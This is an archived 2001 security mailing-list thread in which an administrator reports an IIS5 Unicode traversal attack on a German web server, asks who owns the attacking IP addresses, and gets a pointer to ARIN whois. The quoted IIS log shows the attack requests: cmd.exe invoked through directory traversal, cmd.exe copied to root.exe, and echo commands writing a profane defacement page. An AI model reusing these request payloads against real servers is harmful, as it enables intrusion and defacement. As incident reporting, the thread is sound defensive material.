Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

RE: who's owning this ip?

From: "Matt Rowley" <matt.rowley () streampipe com>
Date: Mon, 14 May 2001 13:26:17 -0400
http://www.arin.net/cgi-bin/whois.pl
to reverse lookup the ip for the coordinator.

--Matt


-----Original Message-----
From: Incidents Mailing List [mailto:INCIDENTS () SECURITYFOCUS COM]On
Behalf Of Thomas Springer
Sent: Tuesday, May 08, 2001 12:08 PM
To: INCIDENTS () SECURITYFOCUS COM
Subject: who's owning this ip?


We had an attacker exploiting unicode on iis5 yesterday - see funny
chinese-war-pages in the log below. The hacker successfully exploited
IIS-Unicode bug, created ~100 files but was still too dumb to deface the
webserver.

The attacker used 208.22.161.15 and 202.97.205.3.
I tried a trace but ended up with
 ...
 19   210 ms   211 ms   220 ms  pao1-sjc2-oc48-2.pao1.above.net [
 20   210 ms   231 ms   230 ms  208.184.129.244.cmnetcom.com.hk [
 21   200 ms   211 ms   220 ms  202.0.170.34
 22   361 ms   370 ms   411 ms  202.0.170.13
 23   370 ms   391 ms   400 ms  202.97.10.193
 24   521 ms   541 ms   551 ms  202.97.10.66
 25   581 ms   601 ms   581 ms  61.138.38.2
 26   721 ms   711 ms   671 ms  61.180.139.202
 27   341 ms   350 ms   351 ms  202.97.205.3

208.22.161.15 seems to end at
17   130 ms   130 ms   131 ms  ewr-core-02.inet.qwest.net
[205.171.17.130]
18   110 ms   110 ms   111 ms  ewr-brdr-01.inet.qwest.net
[205.171.17.82]
19     *        *        *     Timeout..
....

Any chances to find out, to whom the two ip-adresses belong?
Any tool that copies cmd.exe to root.exe?

I liked this hack, because nothing happend and people her
suddenly develop
security-awareness. hence, even the servers i begged to secure for weeks
are patched now.
BTW it's a german website - nothing to do with an
chinese-american spy-wars.

funny hackerworld...

thomas

--- IIS-Logsnip ---
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 856 70 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>
^<br^>^<br^>
^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+siz
e%3D7+color%
3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22ce
nter%22^>^<f
ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D
%22center%22
^>^<font+size%3D4+color%3Dred^>contact:sysadmcn () yahoo com cn^</h
tml^>>.././i
ndex.asp 502 355 423 - - -
2001-05-07 12:28:55 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>
^<br^>^<br^>
^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+siz
e%3D7+color%
3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22ce
nter%22^>^<f
ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D
%22center%22
^>^<font+size%3D4+color%3Dred^>contact:sysadmcn () yahoo com cn^</h
tml^>>.././i
ndex.htm 502 355 423 - - -


Thomas Springer
Previous By Date Next
Previous By Thread Next

Current thread: